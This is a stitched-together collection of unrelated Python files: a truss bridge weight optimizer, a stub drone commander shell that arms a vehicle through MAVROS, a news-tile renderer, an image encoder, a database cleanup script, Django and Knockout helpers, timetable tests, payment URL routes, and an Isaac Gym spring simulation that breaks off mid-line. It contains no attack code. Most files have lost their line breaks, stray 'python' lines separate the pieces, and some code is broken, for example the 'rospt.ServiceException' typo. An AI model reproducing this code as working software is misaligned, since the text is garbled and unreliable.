self.nodes[x].optimize[val] != 0: initial_guess.append(self.nodes[x].pos[val]) initial_guess = np.array(initial_guess) print("Initial Guess", initial_guess) print("Calculating Construction....") constructions_weights = [] load_nr_max_weight = [] results = [] self.max_beams = [] for a in range(0, len(self.load_list)): # Loop through all loads self.current_loads = a print("\n\nCalculating construction for load: ", self.current_loads) # Create optimal for current load if active: result = fmin_powell(self.set_and_calculate, initial_guess, xtol=0.01, ftol=0.005) else: result = self.set_and_calculate(initial_guess) self.plot_construction() constructions_weights.append(self.weight) load_nr_max_weight.append(a) results.append(result) self.max_beams.append(self.beams) for y in range(0, len(self.load_list)): # Make construction strong so that current optimal can hold all loads if a == y: continue self.current_loads = y self.set_and_calculate(result) for t in range(0, len(self.beams)): if self.max_beams[a][t].weight < self.beams[t].weight: self.max_beams[a][t] = self.beams[t] # Calculate the weight of current strong optimal self.weight = 0 for t in range(0, len(self.beams)): self.beams[t] = self.max_beams[a][t] self.weight += self.beams[t].weight if self.weight > constructions_weights[a]: constructions_weights[a] = self.weight load_nr_max_weight[a] = y minimum = min(constructions_weights) load_index = constructions_weights.index(minimum) self.current_loads = load_nr_max_weight[load_index] self.set_and_calculate(results[load_index]) self.beams = self.max_beams[load_index] self.weight = minimum print("\n\nThe best weight for all loads is:", minimum, "kg") print("This is bridge is optimized for load nr: ", load_index) self.plot_construction(finished=True) while True: self.window.hold() def set_and_calculate(self, new_values): """ Sets the variable positions, rebuilds all the beams and calculates the weight of the construction :return: """ self.iteration += 1 t = 0 for x in range(0, len(self.nodes)): if not np.any(self.nodes[x].optimize): continue for val in range(0, len(self.nodes[x].optimize)): if self.nodes[x].optimize[val] != 0: self.nodes[x].pos[val] = new_values[t] t += 1 self.set_beams() self.get_weight() if self.inter_plot: try: 
self.plot_construction() except: print("\nWarning plot failed \n") return self.weight def get_weight(self): lightest_weight = np.inf best_material = {} for material in self.materials: self.set_material(self.materials[material]) self.calculate_weight() if self.weight < lightest_weight: best_material = material lightest_weight = self.weight self.set_material(self.materials[best_material]) self.material = str(best_material) self.calculate_weight() def get_max_beams(self): pass def calculate_weight(self): """ Calculates the weight of each beam and the total weight of the construction using linear algebra :return: """ self.matrix = [] for x in range(0, len(self.beams)): self.matrix.append(self.beams[x].connections) self.matrix = np.array(self.matrix) self.matrix = self.matrix.transpose() size = np.shape(self.matrix) missing = size[0] - size[1] for x in range(0, missing): zeros = np.array([np.zeros(size[0])]) self.matrix = np.concatenate((self.matrix, zeros.T), axis=1) t = size[1] for x in range(0, len(self.nodes)): if self.nodes[x].constraint_x != 0: self.matrix[2 * x][t] = self.nodes[x].constraint_x t += 1 if self.nodes[x].constraint_y != 0: self.matrix[2 * x + 1][t] = self.nodes[x].constraint_y t += 1 self.B = np.zeros(np.shape(self.matrix)[0]) for x in range(0, len(self.nodes)): self.nodes[x].load = np.array([0, 0]) for x in range(0, len(self.beams)): self.nodes[self.beams[x].a_node].load = \ self.nodes[self.beams[x].a_node].load + self.beams[x].load_nodes self.nodes[self.beams[x].b_node].load = \ self.nodes[self.beams[x].b_node].load + self.beams[x].load_nodes for x in range(0, len(self.nodes)): self.B[2 * x] = self.nodes[x].load[0] self.B[2 * x + 1] = self.nodes[x].load[1] self.weight = 0 try: self.X = np.dot(np.linalg.inv(self.matrix), self.B) except np.linalg.linalg.LinAlgError: print("\nWarning linear algebra Error\n") self.X = np.full(size[0], 1e20) for x in range(0, len(self.beams)): self.beams[x].calculate_beam_weight(self.X[x]) self.weight += self.beams[x].weight return self.weight def set_material(self, current_material: dict): """Sets the currently selected material""" for beam in self.beams: beam.yield_strength = current_material["yield_strength"] beam.E_modulus = current_material["E_modulus"] beam.density = current_material["density"] def get_materials(self): """Gets all available materials from the materials.json dictionary""" with open("materials.json", "r") as read_file: self.materials = json.load(read_file) read_file.close() self.set_material(self.materials[list(self.materials.keys())[0]]) def __str__(self): """Overwritten method to print its data in a certain format when using print() or str()""" text: str = "\n " text += "\nA =\n" + str(self.matrix) text += "\n\nB = \n" + str(self.B) text += "\n\nX = \n" + str(self.X) text += "\n\n\t " for x in range(0, len(self.beams)): text += str(self.beams[x]) text += "\n\nTotal weight bridge: {0:.3f} kg\n".format(round(self.weight, 3)) return text def plot_construction(self, finished=False): offset: Vector = (200, 400) def inv(pos: Vector): pos: Vector = pos * np.array([1, -1]) # invert y-axis for graphics pos: Vector = pos * 200 + offset return pos for beam in self.beams: self.window.draw_beam(beam.name, inv(beam.pos1), inv(beam.pos2), beam.internal_force, size=int((beam.area * 1e6)**0.7)) for node in self.nodes: self.window.draw_node(node.name, inv(node.pos)) self.window.draw_force(node.name, inv(node.pos), node.load) if node.constraint_x != 0: self.window.draw_constraint_x(node.name + "x", inv(node.pos)) if node.constraint_y != 0: 
self.window.draw_constraint_y(node.name + "y", inv(node.pos)) if np.any(node.optimize): self.window.draw_editable(inv(node.pos)) self.window.add_text((50, 50), "Weight: {0:.3f} kg".format(round(self.weight, 3))) self.window.add_text((50, 70), "Material: " + self.material) self.window.add_text((50, 90), "Iteration: " + str(self.iteration)) if finished: self.window.add_text((50, 30), "OPTIMAL SOLUTION FOUND: ") self.window.add_text((50, 520), "NODES: ") for x in range(0, len(self.nodes)): b = 50 + (x // 5) * 150 h = (x % 5) * 30 + 550 self.window.add_text((b, h), str(self.nodes[x])) self.window.add_text((400, 520), "BEAMS: ") for x in range(0, len(self.beams)): b = 400 + (x // 5) * 300 h = (x % 5) * 30 + 550 self.window.add_text((b, h), self.beams[x].single_line()) self.window.show() if __name__ == "__main__": np.set_printoptions(precision=2) scale: float = 1 # meter load: float = 1000 # Newton # A list of all the nodes in the construction o_nodes = [ Node("A", (0.00001, 0.00001), constraint_x=-1, constraint_y=-1), Node("B", (1.00001 * scale, 0.00001)), Node("C", (1.99999 * scale, 0.00001)), Node("D", (3.00001 * scale, 0.00001)), Node("E", (4.00001 * scale, 0.00001), constraint_y=-1), Node("F", (3.00002 * scale, 1.00002 * scale)), Node("G", (2.00001 * scale, 1.000001 * scale)), Node("H", (1.00003 * scale, 1.00003 * scale)) ] # A list of all the beams or rods that connect to certain nodes o_beams = [ ["AB", 0, 1], ["AH", 0, 7], ["BC", 1, 2], ["BH", 1, 7], ["BG", 1, 6], ["CD", 2, 3], ["CG", 2, 6], ["DE", 3, 4], ["DF", 3, 5], ["DG", 3, 6], ["EF", 4, 5], ["FG", 5, 6], ["GH", 6, 7], ] # A list of all the different loads placed on the beams o_loads = [ [ [0, -1 * load], [0, 0], [0, -1 * load], [0, 0], [0, 0], [0, -1 * load], [0, 0], [0, -1 * load], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0] ] , [ [0, -2 * load], [0, 0], [0, -1 * load], [0, 0], [0, 0], [0, -0.5 * load], [0, 0], [0, -1 * load], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0] ] , [ [0, -3 * load], [0, 0], [0, -1 * load], [0, 0], [0, 0], [0, -4 * load], [0, 0], [0, -1 * load], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0] ] ] # All dimensions of the nodes that will be optimized are given a 1 value o_nodes[1].optimize = np.array([1, 0]) o_nodes[2].optimize = np.array([1, 0]) o_nodes[3].optimize = np.array([1, 0]) o_nodes[5].optimize = np.array([1, 1]) o_nodes[6].optimize = np.array([1, 1]) o_nodes[7].optimize = np.array([1, 1]) # Creates a construction with the given nodes and beams bridge_1 = Construction("Bridge 1", o_nodes, o_beams, o_loads) # The bridge is calculated for most optimal weight/load ratio bridge_1.optimize(active=True, inter_plot=True) print(bridge_1)
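
# For reference, a minimal materials.json that Construction.get_materials()
# could load: a mapping of material names to the three keys read by
# set_material(). The material names and the aluminium values below are
# illustrative assumptions; the steel figures mirror the defaults set on Beam.
#
# {
#     "structural steel": {"yield_strength": 250e6, "E_modulus": 210e9, "density": 7850},
#     "aluminium":        {"yield_strength": 240e6, "E_modulus": 69e9,  "density": 2700}
# }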
python
""" This commander shell will be a implementation of the PX4 'commander' CLI (https://docs.px4.io/v1.9.0/en/flight_modes/). Here you can switch modes on the go. Will require root access for safety reasons. """ from cmd import Cmd import logger import rospy from mavros_msgs.srv import CommandBool banner = """ _____ ____ __ __ __ __ _ _ _____ ______ _____ / ____/ __ \| \/ | \/ | /\ | \ | | __ \| ____| __ \ | | | | | | \ / | \ / | / \ | \| | | | | |__ | |__) | | | | | | | |\/| | |\/| | / /\ \ | . ` | | | | __| | _ / | |___| |__| | | | | | | |/ ____ \| |\ | |__| | |____| | \ \ \_____\____/|_| |_|_| |_/_/ \_\_| \_|_____/|______|_| \_\ """ log = logger.get_logger(__name__) def parse(arg): 'Convert a series of zero or more numbers to an argument tuple' return tuple(arg.split()) class CommanderCmd(Cmd): intro = banner+ "\nType ? to see a list of available commands" prompt = "Commander > " #Takeoff Auto [Position fix required (e.g. GPS)] Vehicle initiates the takeoff sequence using either catapult/hand-launch mode or runway takeoff mode (in the current direction). def do_takeoff(self, inp): pass def help_takeoff(self): pass #Land Auto [Position fix required (e.g. GPS)] Vehicle initiates the fixed-wing landing sequence. def do_land(self,inp): pass def help_land(self): pass #Hold Auto [Position fix required (e.g. GPS)] Vehicle circles around the GPS hold position at the current altitude. def do_hold(self,inp): pass def help_hold(self): pass #Return Auto [Position fix required (e.g. GPS)] Vehicle ascends to a safe height and then returns to its home position and circles. def do_return(self, inp): pass def help_return(self): pass #Mission Auto [Position fix required (e.g. GPS)] Vehicle executes a predefined mission/flight plan that has been uploaded to the flight controller. def do_mission(self, inp): pass def help_mission(self): pass ### Commander Shell functionality ## def do_arm(self,inp): rospy.wait_for_service("/mavros/cmd/arming") try: arming = rospy.ServiceProxy("mavros/cmd/arming", CommandBool) if inp.lower() == "true": resp = arming(True) resp = "Success: " + str(resp.success) elif inp.lower() == "false": resp = arming(False) resp = "Success: " + str(resp.success) else: resp = "No value argument (true/false) given" print(resp) except rospt.ServiceException, e: print("Service arm call failed: %s"%e) ### WP Shell functionality ## def do_exit(self,inp): print() if input("Do you want to exit commander? Y/[N] ").lower() == "y": log.info("Exiting the commander") return True def help_exit(self): pass help_EOF = help_exit do_EOF = do_exit def emptyline(self): pass
python
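# A minimal standalone sketch of the arming call that do_arm above wraps,
# usable outside the Cmd shell. It assumes a running ROS master with mavros
# connected; the node name "commander_test" is illustrative only.
import rospy
from mavros_msgs.srv import CommandBool


def set_armed(arm):
    rospy.wait_for_service("/mavros/cmd/arming")
    try:
        arming = rospy.ServiceProxy("/mavros/cmd/arming", CommandBool)
        return arming(arm).success
    except rospy.ServiceException as e:
        rospy.logerr("Arming service call failed: %s", e)
        return False


if __name__ == "__main__":
    rospy.init_node("commander_test", anonymous=True)
    print("Armed:", set_armed(True))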
from data.scraper import DataScraper from PIL import Image,ImageFont,ImageDraw import time class GenerateTiles: def __init__(self,FONT,FONT_SIZE,FONT_COLOR,TILE_SIZE,TILE_BG_COLOR): self.FONT = FONT self.FONT_COLOR = FONT_COLOR self.FONT_SIZE = FONT_SIZE self.TILE_SIZE = TILE_SIZE self.TILE_BG_COLOR = TILE_BG_COLOR #for the logo and title self.LOGO_SIZE = (50,50) self.TITLE_FONT_SIZE = int(sum(self.TILE_SIZE) / 40) self.TITLE_FONT_COLOR = (255,255,255,255) self.LOGO_TITLE_FONT = ImageFont.truetype(font="arial.ttf",size=self.TITLE_FONT_SIZE) #last updated field self.LU_FONT_SIZE = 12 self.LU_FONT_COLOR = (255,255,255,255) self.LU_FONT = ImageFont.truetype(font="arial.ttf",size=self.LU_FONT_SIZE) #Titles self.LOCAL_NEWS_TITLE = "My Republica" self.INT_NEWS_TITLE = "New York Times" # News parser is needed to make sure that the text doesn't render out of the screen def news_parser(self,NEWS): #The "breadth" of the canvas render_limit = self.TILE_SIZE[1] #check for each article in the list. for artice_no,news_articles in enumerate(NEWS): length_of_article = len(news_articles) no_of_chars = 0 index = 0 #for each character consider a certain no of pixels are used up. So, if the text is long it takes up more pixels than the render_limit, #in which case we add a break line in the article for characters in news_articles: # The multiplication factor can be changed if needed, but 0.5 seems to work the best; the 0.5 essentially means a line break is added # after a certain no of characters have been printed no_of_chars += 0.50 * self.FONT_SIZE # this cannot be 1 because different characters seem to take up different amont of pixels to render index += 1 if no_of_chars > render_limit: news_articles = news_articles[:index] + "-\n" + news_articles[index:] no_of_chars = 0 NEWS[artice_no] = news_articles return NEWS def generate_localnews_tile(self): with Image.open("./images/local_logo.png") as logo: logo = logo.convert(mode="RGBA",colors=(0,0,0,0)) logo = logo.resize(self.LOGO_SIZE) logo = logo.copy() # A blank image where the text is rendered; canvas = Image.new("RGBA",size=self.TILE_SIZE,color=self.TILE_BG_COLOR) # Rendering the actual text drawing = ImageDraw.Draw(canvas) '''Text Rendering Settings''' '''Starting posn for drawing text; certain % times size of the canvas ''' # Changing the multiplication factor is enough to change the position __TEXT_POSN_X = 0 * self.TILE_SIZE[0] __TEXT_POSN_Y = 0.1 * self.TILE_SIZE[1] # Spacing between each line; changing the multiplication factor is enough __SPACING_BETN_LINES = int(1.4 * self.FONT_SIZE) # keeps track of the lines printed on the screen _lines = 0 # Scrapes the data required __LOCAL_NEWS = self.news_parser(DataScraper().localnews()) #draw the logo canvas.paste(im=logo,box=(0,0)) drawing.text(xy=(__TEXT_POSN_X+200,__TEXT_POSN_Y-40),text=self.LOCAL_NEWS_TITLE,font=self.LOGO_TITLE_FONT,fill=self.TITLE_FONT_COLOR) _lines+=1 #draw updated time last_updated = time.strftime("Last Updated: %x At %X %p") drawing.text(xy=(self.TILE_SIZE[0]-225,self.TILE_SIZE[1]-15),text=last_updated,font=self.LU_FONT,fill=self.LU_FONT_COLOR) for news_article in __LOCAL_NEWS: drawing.multiline_text(xy=(__TEXT_POSN_X,__TEXT_POSN_Y+(__SPACING_BETN_LINES*_lines)),text=news_article,font=self.FONT,fill=self.FONT_COLOR) _lines += 1 if "\n" in news_article: _lines += news_article.count("\n") return canvas # canvas.save("local_news.png") def generate_int_news_tile(self): with Image.open("./images/int_logo.png") as logo: logo = logo.convert(mode="RGBA",colors=(0,0,0,0)) logo = 
logo.resize(self.LOGO_SIZE) logo = logo.copy() # A blank image where the text is rendered; canvas = Image.new("RGBA",size=self.TILE_SIZE,color=self.TILE_BG_COLOR) # Rendering the actual text drawing = ImageDraw.Draw(canvas) '''Text Rendering Settings''' '''Starting posn for drawing text; certain % times size of the canvas ''' # Changing the multiplication factor is enough to change the position __TEXT_POSN_X = 0 * self.TILE_SIZE[0] __TEXT_POSN_Y = 0.1 * self.TILE_SIZE[1] # Spacing between each line; changing the multiplication factor is enough __SPACING_BETN_LINES = int(1.4 * self.FONT_SIZE) # keeps track of the lines printed on the screen _lines = 0 # Scrapes the data required __LOCAL_NEWS = self.news_parser(DataScraper().int_news()) #draw the logo canvas.paste(im=logo,box=(0,0)) drawing.text(xy=(__TEXT_POSN_X+200,__TEXT_POSN_Y-40),text=self.INT_NEWS_TITLE,font=self.LOGO_TITLE_FONT,fill=self.TITLE_FONT_COLOR ) _lines+=1 #draw updated time last_updated = time.strftime("Last Updated: %x At %X %p") drawing.text(xy=(self.TILE_SIZE[0]-225,self.TILE_SIZE[1]-15),text=last_updated,font=self.LU_FONT,fill=self.LU_FONT_COLOR) for news_article in __LOCAL_NEWS: drawing.multiline_text(xy=(__TEXT_POSN_X,__TEXT_POSN_Y+(__SPACING_BETN_LINES*_lines)),text=news_article,font=self.FONT,fill=self.FONT_COLOR) _lines += 1 if "\n" in news_article: _lines += news_article.count("\n") return canvas # canvas.save("int_news.png")
python
# -*- coding: utf-8 -*- """ Created on Mon Nov 2 14:56:30 2020 @author: sanja """ import numpy as np from matplotlib import pyplot as plt import cv2 import binascii img = cv2.imread('4119.png') img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY ) # Converting RGB to gray #height, width = fi # Find height and width of image #print(filename.shape) #with open(filename, 'rb') as f: # content = f.read() #print(binascii.hexlify(content)) #print(len(content)) #print(img) height, width = img.shape # Find height and width of image #img= str(img) img1 = "" #print(img1) for i in range(width): for j in range(height): if int(img[j][i]) < 10: img1 = img1 + "00" + str(int(img[j][i])) elif int(img[j][i]) < 100: img1 = img1 + "0" + str(img[j][i]) else: img1 = img1 + str(img[j][i]) #print(img1) #img_String='' #for i in range(width): # for j in range(height): # img_String= img_String + str(img1[j][i]) #img_String.replace("0x","") #print(img_String)
python
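# The nested loop in the script above zero-pads every grayscale pixel value to
# three decimal digits and concatenates them column by column. A short sketch
# of the same encoding with str.zfill; the image path is the same placeholder
# file used above.
import cv2

img = cv2.imread('4119.png', cv2.IMREAD_GRAYSCALE)
height, width = img.shape

encoded = "".join(
    str(int(img[j][i])).zfill(3)
    for i in range(width)
    for j in range(height)
)
print(len(encoded) == width * height * 3)  # every pixel contributes exactly 3 characters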
from ConexionSQL import ConexionSQL


def clean_api_count():
    conSql = ConexionSQL()
    conn = conSql.getConexion()
    cur = conSql.getCursor()

    query = """DELETE FROM tokens_count WHERE tiempo < (current_timestamp - interval '15 minutes');"""
    cur.execute(query)
    conn.commit()

    # VACUUM cannot run inside a transaction block, so switch to autocommit first
    old_isolation_level = conn.isolation_level
    conn.set_isolation_level(0)
    query = "VACUUM FULL"
    cur.execute(query)
    conn.set_isolation_level(old_isolation_level)
    conn.commit()

    query = 'SELECT count(id) from tokens_count'
    cur.execute(query)
    print "quedan %d tokens_count" % cur.fetchone()[0]


if __name__ == '__main__':
    clean_api_count()
python
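# PostgreSQL refuses to run VACUUM inside a transaction block, which is why
# the script above drops the isolation level to 0 (autocommit) before issuing
# it. A minimal psycopg2 sketch of the same pattern; the DSN and table name
# are placeholders, not the project's real settings.
import psycopg2

conn = psycopg2.connect("dbname=proxies user=postgres")
try:
    conn.autocommit = True  # equivalent to conn.set_isolation_level(0)
    with conn.cursor() as cur:
        cur.execute("VACUUM FULL tokens_count")
finally:
    conn.autocommit = False
    conn.close()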
def get_knockout_options(model_class, form):
    knockout_options = {
        'knockout_exclude': [],
        'knockout_fields': [],
        'knockout_field_names': [],
        'click_checked': True,
    }

    for item in (model_class, form):
        if not item:
            continue

        has_fields_and_exclude = (
            hasattr(item, 'knockout_exclude') and
            hasattr(item, 'knockout_fields')
        )
        if has_fields_and_exclude:
            raise Exception(
                'Define knockout_exclude or knockout_fields, not both'
            )

        for option, default in knockout_options.items():
            if hasattr(item, option):
                value = getattr(item, option)
                if callable(value):
                    knockout_options[option] = value()
                else:
                    knockout_options[option] = value

    return knockout_options


def get_knockout_field_options(
    field, knockout_fields, knockout_exclude, knockout_field_names
):
    exclude = (
        (knockout_fields and field.name not in knockout_fields) or
        (field.name in knockout_exclude)
    )

    if field.name in knockout_field_names:
        field_name = knockout_field_names[field.name]
    else:
        field_name = field.name

    return exclude, field_name
python
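# A small usage sketch for get_knockout_options above. It assumes the helpers
# are importable from a module (the name knockout_utils is hypothetical) and
# that the model class opts in through knockout_fields / knockout_field_names.
from knockout_utils import get_knockout_options


class Person:
    knockout_fields = ['first_name', 'last_name']
    knockout_field_names = {'first_name': 'firstName'}


options = get_knockout_options(Person, form=None)
print(options['knockout_fields'])       # ['first_name', 'last_name']
print(options['knockout_field_names'])  # {'first_name': 'firstName'}
print(options['click_checked'])         # True (the default is kept)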
# from coursesical.course import * from course import * def test0(): t = TimeTable([("08:00", "10:10")]) s = Semester("2021-03-01", t) r = RawCourse( name="通用魔法理论基础(2)", group="(下课派:DD23333;疼逊会议)", teacher="伊蕾娜", zc="1-16(周)", classroom="王立瑟雷斯特利亚", weekday=0, time=0, text="""71010223-1 通用魔法理论基础(2) (下课派:DD23333;疼逊会议) 伊蕾娜 1-16(周) 王立瑟雷斯特利亚 """ ) c = Course(s, r) print(c.name, c.class_begin, c.class_over, c.until) print(new_course(s, r)) def test1(): t = TimeTable([("08:00", "09:40"), ("10:00", "11:40"), ("14:30", "16:10"), ("16:30", "18:10"), ("19:30", "21:10")]) s = Semester("2021-03-01", t) r = RawCourse( name="形势与政策(20212)", group="", teacher="思政", zc="12,14-16(周)", classroom="教三十楼B座709", weekday=1, time=2, text="""71420212-41 形势与政策(20212) 思政 12,14(周) 教三十楼B座709 星期六 第六大节 """ ) for c in new_course(s, r): print(c.name, c.class_begin, c.class_over, c.until) print(new_course(s, r)) if __name__ == "__main__": print('---0:') test0() print('---1:') test1()
python
from django.conf.urls import url

from bluebottle.funding_flutterwave.views import FlutterwavePaymentList, FlutterwaveWebhookView, \
    FlutterwaveBankAccountAccountList, FlutterwaveBankAccountAccountDetail

urlpatterns = [
    url(r'^/payments/$',
        FlutterwavePaymentList.as_view(),
        name='flutterwave-payment-list'),
    url(r'^/webhook/$',
        FlutterwaveWebhookView.as_view(),
        name='flutterwave-payment-webhook'),
    url(r'^/bank-accounts/$',
        FlutterwaveBankAccountAccountList.as_view(),
        name='flutterwave-external-account-list'),
    url(r'^/bank-accounts/(?P<pk>[\d]+)$',
        FlutterwaveBankAccountAccountDetail.as_view(),
        name='flutterwave-external-account-detail'),
]
python
""" Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved. NVIDIA CORPORATION and its licensors retain all intellectual property and proprietary rights in and to this software, related documentation and any modifications thereto. Any use, reproduction, disclosure or distribution of this software and related documentation without an express license agreement from NVIDIA CORPORATION is strictly prohibited. DOF control methods example --------------------------- An example that demonstrates various DOF control methods: - Load cartpole asset from an urdf - Get/set DOF properties - Set DOF position and velocity targets - Get DOF positions - Apply DOF efforts """ import math from numpy.core.getlimits import _fr1 from isaacgym import gymapi from isaacgym import gymutil from isaacgym import gymtorch import torch import time def QUEST_Algo(): # Average of quaternions. pass # initialize gym gym = gymapi.acquire_gym() # parse arguments args = gymutil.parse_arguments(description="Joint control Methods Example") # create a simulator sim_params = gymapi.SimParams() sim_params.substeps = 2 sim_params.dt = 1.0 / 1000.0 # sim_params.flex.shape_collision_margin = 0.25 # sim_params.flex.num_outer_iterations = 4 # sim_params.flex.num_inner_iterations = 10 # sim_params.flex.solver_type = 2 # sim_params.flex.deterministic_mode = 1 sim_params.physx.solver_type = 1 sim_params.physx.num_position_iterations = 4 sim_params.physx.num_velocity_iterations = 1 sim_params.physx.num_threads = args.num_threads sim_params.physx.use_gpu = args.use_gpu sim_params.use_gpu_pipeline = False # sim_params.gravity = gymapi.Vec3(0.0, 0.0, 0.0) if args.use_gpu_pipeline: print("WARNING: Forcing CPU pipeline.") device = 'cpu' sim = gym.create_sim(args.compute_device_id, args.graphics_device_id, args.physics_engine, sim_params) # sim = gym.create_sim(args.compute_device_id, args.graphics_device_id, gymapi.SIM_FLEX, sim_params) if sim is None: print("*** Failed to create sim") quit() # create viewer using the default camera properties viewer = gym.create_viewer(sim, gymapi.CameraProperties()) if viewer is None: raise ValueError('*** Failed to create viewer') # add ground plane plane_params = gymapi.PlaneParams() plane_params.static_friction = 0.0 plane_params.dynamic_friction = 0.0 gym.add_ground(sim, gymapi.PlaneParams()) # set up the env grid num_envs = 1 spacing = 1.5 env_lower = gymapi.Vec3(-spacing, 0.0, -spacing) env_upper = gymapi.Vec3(spacing, 0.0, spacing) collision_group = 0 collision_filter = 0 # add cartpole urdf asset asset_root = "../../assets" asset_file = "urdf/RodAssembly/urdf/RodAssembly.urdf" # Load asset with default control type of position for all joints asset_options = gymapi.AssetOptions() asset_options.fix_base_link = False asset_options.angular_damping = 1 asset_options.max_angular_velocity = 100 asset_options.default_dof_drive_mode = gymapi.DOF_MODE_POS print("Loading asset '%s' from '%s'" % (asset_file, asset_root)) post_asset = gym.load_asset(sim, asset_root, asset_file, asset_options) asset_options.fix_base_link = False sling_asset = gym.load_asset(sim, asset_root, asset_file, asset_options) # initial root pose for cartpole actors initial_pose = gymapi.Transform() # Create environment 0 # Cart held steady using position target mode. # Pole held at a 45 degree angle using position target mode. 
env0 = gym.create_env(sim, env_lower, env_upper, 2) radius = 0.05 theta = torch.tensor(0*3.1415/180) initial_pose.p = gymapi.Vec3(radius*torch.cos(theta), 0.25, radius*torch.sin(theta)) initial_pose.r = gymapi.Quat.from_euler_zyx(-3.1415/4, 0, 0) Sling = gym.create_actor(env0, sling_asset, initial_pose, 'Sling', collision_group, collision_filter) theta = torch.tensor(120*3.1415/180) initial_pose.p = gymapi.Vec3(radius*torch.cos(theta), 0.25, radius*torch.sin(theta)) initial_pose.r = gymapi.Quat.from_euler_zyx(-3.1415/4, 3.1415*2/3, 0) LeftPost = gym.create_actor(env0, post_asset, initial_pose, 'LeftPost', collision_group, collision_filter) theta = torch.tensor(240*3.1415/180) initial_pose.p = gymapi.Vec3(radius*torch.cos(theta), 0.25, radius*torch.sin(theta)) initial_pose.r = gymapi.Quat.from_euler_zyx(-3.1415/4, 3.1415*4/3, 0) RightPost = gym.create_actor(env0, post_asset, initial_pose, 'RightPost', collision_group, collision_filter) gym.set_rigid_body_color(env0, Sling, 0, gymapi.MESH_VISUAL, gymapi.Vec3(0.97, 0.38, 0.06)) gym.set_rigid_body_color(env0, Sling, 1, gymapi.MESH_VISUAL, gymapi.Vec3(0.06, 0.97, 0.38)) gym.set_rigid_body_color(env0, Sling, 2, gymapi.MESH_VISUAL, gymapi.Vec3(0.38, 0.06, 0.97)) gym.set_rigid_body_color(env0, LeftPost, 0, gymapi.MESH_VISUAL, gymapi.Vec3(0.97, 0.38, 0.06)) gym.set_rigid_body_color(env0, LeftPost, 1, gymapi.MESH_VISUAL, gymapi.Vec3(0.06, 0.97, 0.38)) gym.set_rigid_body_color(env0, LeftPost, 2, gymapi.MESH_VISUAL, gymapi.Vec3(0.38, 0.06, 0.97)) gym.set_rigid_body_color(env0, RightPost, 0, gymapi.MESH_VISUAL, gymapi.Vec3(0.97, 0.38, 0.06)) gym.set_rigid_body_color(env0, RightPost, 1, gymapi.MESH_VISUAL, gymapi.Vec3(0.06, 0.97, 0.38)) gym.set_rigid_body_color(env0, RightPost, 2, gymapi.MESH_VISUAL, gymapi.Vec3(0.38, 0.06, 0.97)) # Look at the first env cam_pos = gymapi.Vec3(0.5, 0.5, 0) cam_target = gymapi.Vec3(0, 0, 0) gym.viewer_camera_look_at(viewer, None, cam_pos, cam_target) num_actors = gym.get_actor_count(env0) num_bodies = gym.get_env_rigid_body_count(env0) # Get state tensors rb_state_tensor = gym.acquire_rigid_body_state_tensor(sim) rb_state = gymtorch.wrap_tensor(rb_state_tensor) print(rb_state.shape) rb_pos = rb_state.view(num_bodies, 13)[:,0:3] #(num_envs, num_rigid_bodies, 13)[pos,ori,Lin-vel,Ang-vel] rb_ori = rb_state.view(num_bodies, 13)[:,3:7] #(num_envs, num_rigid_bodies, 13)[pos,ori,Lin-vel,Ang-vel] rb_lin_vel = rb_state.view(num_bodies, 13)[:,7:10] #(num_envs, num_rigid_bodies, 13)[pos,ori,Lin-vel,Ang-vel] rb_ang_vel = rb_state.view(num_bodies, 13)[:,10:13] #(num_envs, num_rigid_bodies, 13)[pos,ori,Lin-vel,Ang-vel] # gym.refresh_dof_state_tensor(sim) # gym.refresh_actor_root_state_tensor(sim) gym.refresh_rigid_body_state_tensor(sim) print('rb_pos') print(rb_pos) body_names = [gym.get_asset_rigid_body_name(post_asset, i) for i in range(gym.get_asset_rigid_body_count(post_asset))] extremity_names = [s for s in body_names if "endpoint" in s] extremity_indices = [gym.find_asset_rigid_body_index(post_asset, name) for name in extremity_names] print(body_names) print(extremity_names) print(extremity_indices) # Simulate spring_coff = 50 damping_coff = 0.999 spring_length = 0.0 frame_count = 0 connection_list = [] # (1,2),(4,5),(7,8) # Connect All Bottoms connection_list.append((1, 4, 0.1)) connection_list.append((1, 7, 0.1)) connection_list.append((4, 7, 0.1)) #Connect All Tops connection_list.append((2, 5, 0.1)) connection_list.append((2, 8, 0.1)) connection_list.append((5, 8, 0.1)) #Top1 to Bottom2 connection_list.append((2, 4, 0.1)) 
#Body0 top is connected to Body1 bottom #Top2 to Bottom3 connection_list.append((5, 7, 0.1)) #Body0 top is connected to Body1 bottom #Top3 to Bottom1 connection_list.append((8, 1, 0.1)) #Body0 top is connected to Body1 bottom centerleftright = 1 counter = torch.tensor(0) while not gym.query_viewer_has_closed(viewer): # time.sleep(2) spring_length_multiplier = torch.cos(counter/100)*0.8 + 1 #Modifies the length from 0.2 to 1.8 the specified length counter += 1 gym.refresh_rigid_body_state_tensor(sim) forces = torch.zeros((num_envs, num_bodies, 3), device=device, dtype=torch.float) force_positions = rb_pos.clone() num_lines = len(connection_list) line_vertices = torch.zeros((num_lines*2,3), device=device, dtype=torch.float) line_colors = torch.zeros((num_lines,3), device=device, dtype=torch.float) i = 0 for connection in connection_list: # print(connection) P1 = force_positions[connection[0],:] P2 = force_positions[connection[1],:] spring_constant = spring_coff spring_length = connection[2]*spring_length_multiplier endpoint_distance = torch.norm(P1-P2) endpoint_normalized_vector = (P1-P2)/endpoint_distance spring_force = spring_constant*(endpoint_distance-spring_length) # Set springs to only work for tension and not compression spring_force = torch.max(torch.tensor(spring_force), torch.zeros_like(spring_force)) appled_force = endpoint_normalized_vector*spring_force # R2 = (P2-P1)/N # F1 = torch.max(torch.tensor(spring_constant*R1*(N-spring_length)), torch.zeros_like(N)) # F1 = torch.min(torch.tensor(spring_constant*R1*(N-spring_length)), torch.tensor(0)) print('Spring {} Tension = {}'.format(i, spring_force)) forces[0, connection[0], :] -= appled_force forces[0, connection[1], :] += appled_force test = torch.zeros((2,3), device=device, dtype=torch.float) test[0, :] = rb_lin_vel[connection[0], :] test[1, :] = rb_lin_vel[connection[1], :] # print(test.size()) R1T = torch.unsqueeze(endpoint_normalized_vector, 1) print(test.shape) print(R1T.shape) # time.sleep(5) diffthinggy = torch.tensor([[-1, 1]], device=device, dtype=torch.float) # print(diffthinggy) test2 = torch.matmul(diffthinggy, torch.matmul(test, R1T)) # print(R1*test2*damping_coff) # print(R1) forces[0, connection[0], :] += torch.squeeze(endpoint_normalized_vector*test2*damping_coff) forces[0, 